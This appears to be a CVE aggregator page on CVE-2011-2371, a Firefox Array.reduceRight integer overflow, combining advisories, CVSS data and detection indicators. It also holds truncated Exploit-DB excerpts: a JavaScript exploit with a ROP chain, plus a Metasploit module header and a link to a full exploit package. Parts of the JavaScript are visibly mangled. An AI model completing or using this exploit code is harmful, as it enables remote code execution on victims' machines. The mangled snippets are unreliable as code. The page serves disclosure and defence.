CVE-2011-2371
published 2011-06-30CVE-2011-2371: Integer overflow in the Array.reduceRight method in Mozilla Firefox before 3.6.18 and 4.x through 4.0.1, Thunderbird before 3.1.11, and SeaMonkey through…
PriorityP268critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
75.69%
99.5th percentile
Integer overflow in the Array.reduceRight method in Mozilla Firefox before 3.6.18 and 4.x through 4.0.1, Thunderbird before 3.1.11, and SeaMonkey through 2.0.14 allows remote attackers to execute arbitrary code via vectors involving a long JavaScript Array object.
Affected
238 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | <= 3.6.17 | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
PrependEncoder: \xbc\x0c\x0c\x0c\x0c
- →Exploit requires a Java-enabled browser; presence of a Java applet alongside Array.reduceRight() JavaScript is a strong indicator of exploitation attempt. ↗
- →Metasploit module fingerprints the User-Agent for Firefox 3.6.16 or 3.6.17 before serving the exploit payload; detection of exploit delivery can key on this UA filter. ↗
- →The exploit uses MSVCR71.dll ROP gadgets for DEP/ASLR bypass; presence of MSVCR71.dll ROP chains in memory or shellcode is indicative of this exploit. ↗
- →The exploit sets a JavaScript Array length to a large value (0x83000006 observed as signed) to trigger the integer overflow in array_reduceRight; monitor for abnormally large Array length values in JavaScript. ↗
- →Trend Micro Deep Security IDS/IPS rule 1004722 detects exploitation of this vulnerability. ↗
- →Heap spray targets address 0x0c0c0c0c; memory scanning for repeated 0x0c0c0c0c patterns in browser heap is indicative of this exploit's spray technique. ↗
- ·The Metasploit module explicitly checks for Firefox 3.6.16 or 3.6.17 User-Agent and returns 404 for other browsers, limiting exploit delivery to those specific versions. ↗
- ·ROP gadget addresses are hardcoded for MSVCR71.dll on Windows XP/Vista/7; these offsets will not be valid on systems with a different MSVCR71.dll base or version. ↗
- ·The exploit requires a longer amount of time compared to a typical browser exploit to gain control of the machine. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat10.0CRITICAL
vendor_ubuntu10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2ph2-r6cr-hgrj: Integer overflow in the Array
ghsa_unreviewed·2022-05-17
CVE-2011-2371 [HIGH] GHSA-2ph2-r6cr-hgrj: Integer overflow in the Array
Integer overflow in the Array.reduceRight method in Mozilla Firefox before 3.6.18 and 4.x through 4.0.1, Thunderbird before 3.1.11, and SeaMonkey through 2.0.14 allows remote attackers to execute arbitrary code via vectors involving a long JavaScript Array object.
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu·2011-07-15·CVSS 10.0
CVE-2011-0083 [CRITICAL] Thunderbird vulnerabilities
Title: Thunderbird vulnerabilities
Summary: Multiple vulnerabilities were fixed in Thunderbird.
Multiple memory vulnerabilities were discovered in the browser rendering
engine. An attacker could use these to possibly execute arbitrary code with
the privileges of the user invoking Thunderbird. (CVE-2011-2364,
CVE-2011-2365, CVE-2011-2374, CVE-2011-2376)
Martin Barbella discovered that under certain conditions, viewing a XUL
document while JavaScript was disabled caused deleted memory to be
accessed. An attacker could potentially use this to crash Thunderbird or
execute arbitrary code with the privileges of the user invoking
Thunderbird. (CVE-2011-2373)
Jordi Chancel discovered a vulnerability on multipart/x-mixed-replace
images due to memory corruption. An attacker could potentially use
Ubuntu
Firefox regression
vendor_ubuntu·2011-06-29·CVSS 10.0
[CRITICAL] Firefox regression
Title: Firefox regression
Summary: In rare instances, Firefox could have trouble accessing some websites.
USN-1149-1 fixed vulnerabilities in Firefox. Unfortunately, a regression
was introduced that prevented cookies from being stored properly when the
hostname was a single character. This update fixes the problem. We
apologize for the inconvenience.
Original advisory details:
Multiple memory vulnerabilities were discovered in the browser rendering
engine. An attacker could use these to possibly execute arbitrary code with
the privileges of the user invoking Firefox. (CVE-2011-2364, CVE-2011-2365,
CVE-2011-2374, CVE-2011-2376)
Martin Barbella discovered that under certain conditions, viewing a XUL
document while JavaScript was disabled caused deleted memory to be
accessed. An attacker
Ubuntu
Firefox regression
vendor_ubuntu·2011-06-23·CVSS 4.3
[MEDIUM] Firefox regression
Title: Firefox regression
Summary: Under certain circumstances, the updated translations could unintentionally
install firefox.
USN-1157-1 fixed vulnerabilities in Firefox. Unfortunately, this update
produced the side effect of pulling in Firefox on some systems that did not
have it installed during a dist-upgrade due to changes in the Ubuntu
language packs. This update fixes the problem. We apologize for the
inconvenience.
Original advisory details:
Bob Clary, Kevin Brosnan, Gary Kwong, Jesse Ruderman, Christian Biesinger,
Bas Schouten, Igor Bukanov, Bill McCloskey, Olli Pettay, Daniel Veditz and
Marcia Knous discovered multiple memory vulnerabilities in the browser
rendering engine. An attacker could possibly execute arbitrary code with
the privileges of the user invoking Firefox. (C
Ubuntu
Firefox and Xulrunner vulnerabilities
vendor_ubuntu·2011-06-22·CVSS 10.0
CVE-2011-2364 [CRITICAL] Firefox and Xulrunner vulnerabilities
Title: Firefox and Xulrunner vulnerabilities
Summary: Multiple Vulnerabilities were fixed in Firefox and Xulrunner
Multiple memory vulnerabilities were discovered in the browser rendering
engine. An attacker could use these to possibly execute arbitrary code with
the privileges of the user invoking Firefox. (CVE-2011-2364, CVE-2011-2365,
CVE-2011-2374, CVE-2011-2376)
Martin Barbella discovered that under certain conditions, viewing a XUL
document while JavaScript was disabled caused deleted memory to be
accessed. An attacker could potentially use this to crash Firefox or
execute arbitrary code with the privileges of the user invoking Firefox.
(CVE-2011-2373)
Jordi Chancel discovered a vulnerability on multipart/x-mixed-replace
images due to memory corruption. An attacker could potentia
Ubuntu
mozvoikko, ubufox, webfav update
vendor_ubuntu·2011-06-22·CVSS 4.3
[MEDIUM] mozvoikko, ubufox, webfav update
Title: mozvoikko, ubufox, webfav update
Summary: This update provides provides packages compatible with Firefox 5.
USN-1157-1 fixed vulnerabilities in Firefox. This update provides updated
packages for use with Firefox 5.
Original advisory details:
Bob Clary, Kevin Brosnan, Gary Kwong, Jesse Ruderman, Christian Biesinger,
Bas Schouten, Igor Bukanov, Bill McCloskey, Olli Pettay, Daniel Veditz and
Marcia Knous discovered multiple memory vulnerabilities in the browser
rendering engine. An attacker could possibly execute arbitrary code with
the privileges of the user invoking Firefox. (CVE-2011-2374, CVE-2011-2375)
Martin Barbella discovered that under certain conditions, viewing a XUL
document while JavaScript was disabled caused deleted memory to be
accessed. An attacker could potential
Ubuntu
Firefox vulnerabilities
vendor_ubuntu·2011-06-22·CVSS 4.3
CVE-2011-2375 [MEDIUM] Firefox vulnerabilities
Title: Firefox vulnerabilities
Summary: Multiple Firefox vulnerabilities have been fixed
Bob Clary, Kevin Brosnan, Gary Kwong, Jesse Ruderman, Christian Biesinger,
Bas Schouten, Igor Bukanov, Bill McCloskey, Olli Pettay, Daniel Veditz and
Marcia Knous discovered multiple memory vulnerabilities in the browser
rendering engine. An attacker could possibly execute arbitrary code with
the privileges of the user invoking Firefox. (CVE-2011-2374, CVE-2011-2375)
Martin Barbella discovered that under certain conditions, viewing a XUL
document while JavaScript was disabled caused deleted memory to be
accessed. An attacker could potentially use this to crash Firefox or
execute arbitrary code with the privileges of the user invoking Firefox.
(CVE-2011-2373)
Jordi Chancel discovered a vulnerability
Red Hat
Mozilla Integer overflow and arbitrary code execution (MFSA 2011-22)
vendor_redhat·2011-06-21·CVSS 10.0
CVE-2011-2371 [CRITICAL] CWE-190 Mozilla Integer overflow and arbitrary code execution (MFSA 2011-22)
Mozilla Integer overflow and arbitrary code execution (MFSA 2011-22)
Integer overflow in the Array.reduceRight method in Mozilla Firefox before 3.6.18 and 4.x through 4.0.1, Thunderbird before 3.1.11, and SeaMonkey through 2.0.14 allows remote attackers to execute arbitrary code via vectors involving a long JavaScript Array object.
Package: thunderbird (Red Hat Enterprise Linux 6) - Affected
No detection rules found.
Exploit-DB
Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow
exploitdb·2012-02-27·CVSS 10.0
CVE-2011-2371 [CRITICAL] Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow
Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow
---
function hex(x){
var y = x.toString(16);
y = "0x"+y;
return y;
}
function itoa(i)
{
return String.fromCharCode(i);
}
// n - length in bytes (1 unicode char = 2 bytes)
function puff(x, n){
while(x.length >16);
return uni;
}
function odd_d2u(d1, d2){
uni = String.fromCharCode((d1&0xFF)>8)&0xFFFF);
uni += String.fromCharCode((d1>>24)+((d2 & 0xFF)>8)&0xFFFF);
uni += String.fromCharCode(d2>>24);
return uni;
}
// generated with mona.py
function rop_chain(mozjs_base){
var arr = [
mozjs_base + 0x000c96e6, // POP EAX // RETN [mozjs.dll]
mozjs_base + 0x0015d054, // ptr to &VirtualAlloc() [IAT mozjs.dll]
mozjs_base + 0x00028510, // MOV EAX,DWORD PTR DS:[EAX] // RETN [mozjs.dll]
mozjs_base + 0x0014293c, // XCHG EAX,ESI // RET
Exploit-DB
Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)
exploitdb·2011-10-13
CVE-2011-2371 Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)
Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)
---
##
# $Id: mozilla_reduceright.rb 13909 2011-10-13 03:16:15Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "Mozilla Firefox Array.reduceRight() Integer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Mozilla Firefox 3.6. When an
array object is configured with a large length value, the reduceRight() method
may cause an invalid index being used, allowing abitrary remote code execution.
Please note that the exploit requires a l
Exploit-DB
Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)
exploitdb·2011-10-12·CVSS 10.0
CVE-2011-2371 [CRITICAL] Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)
Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)
---
# Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit
# Date: 12 Oct 2011
# Author: Matteo Memelli ryujin -AT- offensive-security.com
# CVE-2011-2371
# Full exploit package: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17974.zip
ff-i-
Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit
Date: 12 Oct 2011
Author: Matteo Memelli ryujin -AT- offensive-security.com
CVE-2011-2371
Full exploit package:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17974.zip
Thx to dookie for helping ;)
Vulnerability discovered by Chris Rohlf and Yan Ivnitskiy of Matasano Security
http://www.mozilla.org/security/announce/2011/mfsa2011-22.html
Metasploit
Mozilla Firefox Array.reduceRight() Integer Overflow
metasploit
Mozilla Firefox Array.reduceRight() Integer Overflow
Mozilla Firefox Array.reduceRight() Integer Overflow
This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index being used, allowing arbitrary remote code execution. Please note that the exploit requires a longer amount of time (compare to a typical browser exploit) in order to gain control of the machine.
Trendmicro
Analysis: Firefox Array.reduceRight() Vulnerability
blogs_trendmicro·2011-10-28·CVSS 10.0
[CRITICAL] Analysis: Firefox Array.reduceRight() Vulnerability
## Analysis: Firefox Array.reduceRight() Vulnerability
Get insights and technical analsyis on Mozilla.
By: Trend Micro Oct 28, 2011 Read time: ( words)
Save to Folio
The usage of exploits in current threats underlines the critical need for users to keep programs updated at all times. Considering the great amount of time people spend on their computers connected to the Internet, web browsers are prime targets for cybercriminals.
This is a technical analysis of a recently discovered vulnerability in one of the most-used web browser: Mozilla Firefox.
This Mozilla Firefox vulnerability was discussed by Charis Rohlf and Yan Lvnitskiy during their presentation, Attacking Clientside JIT Compilers at the Black Hat Conference in Las Vegas earlier this year.
This vulnerability, identified as
Trendmicro
Analysis: Firefox Array.reduceRight() Vulnerability
blogs_trendmicro·2011-10-28·CVSS 10.0
[CRITICAL] Analysis: Firefox Array.reduceRight() Vulnerability
## Analysis: Firefox Array.reduceRight() Vulnerability
Get insights and technical analsyis on Mozilla.
By: Trend Micro 2011/10/28 Read time: ( words)
Save to Folio
The usage of exploits in current threats underlines the critical need for users to keep programs updated at all times. Considering the great amount of time people spend on their computers connected to the Internet, web browsers are prime targets for cybercriminals.
This is a technical analysis of a recently discovered vulnerability in one of the most-used web browser: Mozilla Firefox.
This Mozilla Firefox vulnerability was discussed by Charis Rohlf and Yan Lvnitskiy during their presentation, Attacking Clientside JIT Compilers at the Black Hat Conference in Las Vegas earlier this year.
This vulnerability, identified as CV
Trendmicro
Analysis: Firefox Array.reduceRight() Vulnerability
blogs_trendmicro·2011-10-28·CVSS 10.0
[CRITICAL] Analysis: Firefox Array.reduceRight() Vulnerability
# Analysis: Firefox Array.reduceRight() Vulnerability
Get insights and technical analsyis on Mozilla.
By: Trend Micro
2011/10/28
Read time: ( words)
Save to Folio
The usage of exploits in current threats underlines the critical need for users to keep programs updated at all times. Considering the great amount of time people spend on their computers connected to the Internet, web browsers are prime targets for cybercriminals.
This is a technical analysis of a recently discovered vulnerability in one of the most-used web browser: Mozilla Firefox.
This Mozilla Firefox vulnerability was discussed by Charis Rohlf and Yan Lvnitskiy during their presentation, Attacking Clientside JIT Compilers at the Black Hat Conference in Las Vegas earlier this year.
This vulnerability, identified as CV
Trendmicro
Analysis: Firefox Array.reduceRight() Vulnerability
blogs_trendmicro·2011-10-28·CVSS 10.0
[CRITICAL] Analysis: Firefox Array.reduceRight() Vulnerability
# Analysis: Firefox Array.reduceRight() Vulnerability
Get insights and technical analsyis on Mozilla.
By: Trend Micro
Oct 28, 2011
Read time: ( words)
Save to Folio
The usage of exploits in current threats underlines the critical need for users to keep programs updated at all times. Considering the great amount of time people spend on their computers connected to the Internet, web browsers are prime targets for cybercriminals.
This is a technical analysis of a recently discovered vulnerability in one of the most-used web browser: Mozilla Firefox.
This Mozilla Firefox vulnerability was discussed by Charis Rohlf and Yan Lvnitskiy during their presentation, Attacking Clientside JIT Compilers at the Black Hat Conference in Las Vegas earlier this year.
This vulnerability, identified as
Bugzilla
CVE-2011-2371 Mozilla Integer overflow and arbitrary code execution (MFSA 2011-22)
bugzilla·2011-06-20·CVSS 10.0
CVE-2011-2371 [CRITICAL] CVE-2011-2371 Mozilla Integer overflow and arbitrary code execution (MFSA 2011-22)
CVE-2011-2371 Mozilla Integer overflow and arbitrary code execution (MFSA 2011-22)
Security researchers Chris Rohlf and Yan Ivnitskiy of Matasano Security
reported that when a JavaScript Array object had its length set to an
extremely large value, the iteration of array elements that occurs when
its reduceRight method was subsequently called could result in the
execution of attacker controlled memory due to an invalid index value
being used to access element properties.
Discussion:
Public now via:
[1] http://www.mozilla.org/security/announce/2011/mfsa2011-22.html
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 4
Red Hat Enterprise Linux 5
Via RHSA-2011:0887 https://rhn.redhat.com/errata/RHSA-2011-0887.html
---
This issue has been addressed in foll
http://lists.opensuse.org/opensuse-security-announce/2011-07/msg00001.htmlhttp://secunia.com/advisories/45002http://securityreason.com/securityalert/8472http://support.avaya.com/css/P8/documents/100144854http://support.avaya.com/css/P8/documents/100145333http://www.debian.org/security/2011/dsa-2268http://www.debian.org/security/2011/dsa-2269http://www.debian.org/security/2011/dsa-2273http://www.mandriva.com/security/advisories?name=MDVSA-2011:111http://www.mozilla.org/security/announce/2011/mfsa2011-22.htmlhttp://www.redhat.com/support/errata/RHSA-2011-0885.htmlhttp://www.redhat.com/support/errata/RHSA-2011-0887.htmlhttp://www.redhat.com/support/errata/RHSA-2011-0888.htmlhttp://www.ubuntu.com/usn/USN-1149-1https://bugzilla.mozilla.org/show_bug.cgi?id=664009https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13987http://lists.opensuse.org/opensuse-security-announce/2011-07/msg00001.htmlhttp://secunia.com/advisories/45002http://securityreason.com/securityalert/8472http://support.avaya.com/css/P8/documents/100144854http://support.avaya.com/css/P8/documents/100145333http://www.debian.org/security/2011/dsa-2268http://www.debian.org/security/2011/dsa-2269http://www.debian.org/security/2011/dsa-2273http://www.mandriva.com/security/advisories?name=MDVSA-2011:111http://www.mozilla.org/security/announce/2011/mfsa2011-22.htmlhttp://www.redhat.com/support/errata/RHSA-2011-0885.htmlhttp://www.redhat.com/support/errata/RHSA-2011-0887.htmlhttp://www.redhat.com/support/errata/RHSA-2011-0888.htmlhttp://www.ubuntu.com/usn/USN-1149-1https://bugzilla.mozilla.org/show_bug.cgi?id=664009https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13987
2011-06-30
Published